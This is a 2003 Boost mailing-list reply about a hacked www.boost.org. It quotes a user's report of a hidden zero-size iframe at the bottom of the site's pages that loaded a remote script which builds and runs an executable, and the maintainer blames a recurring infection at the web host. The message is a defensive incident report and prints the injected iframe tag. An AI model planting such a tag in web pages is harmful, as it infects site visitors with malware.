|
Boost : |
From: Beman Dawes (bdawes_at_[hidden])
Date: 2003-09-03 15:29:17
At 04:51 AM 9/3/2003, Raoul Gough wrote:
I was just looking at www.boost.org, and my browser (IE6.0) popped up
a confirmation request to run an Active-X control. Turns out that
right at the bottom of the page is the following:
<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp
width=0 height=0 frameborder=0 marginwidth=0 marginheight=0>
</iframe>
Which leads to a seemingly malicious Visual Basic script at
http://ww.beech-info2.com/cgi-bin/inf2.pl which (from my limited
understanding of Visual Basic) *creates an executable* file from
hexadecimal data and then runs it. Full VB malware script follows .sig
Other pages on www.boost.org have the same problem. I believe this
should be rectified ASAP.
It appears to be fixed at the moment.
The problem is at least moderately serious, and is caused by an recurring
server infection at Interland, the web host. They fix it, it comes back,
they fix it again, and so on.
We've started testing preparatory to moving the web site to SourceForge.
Thanks,
--Beman
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk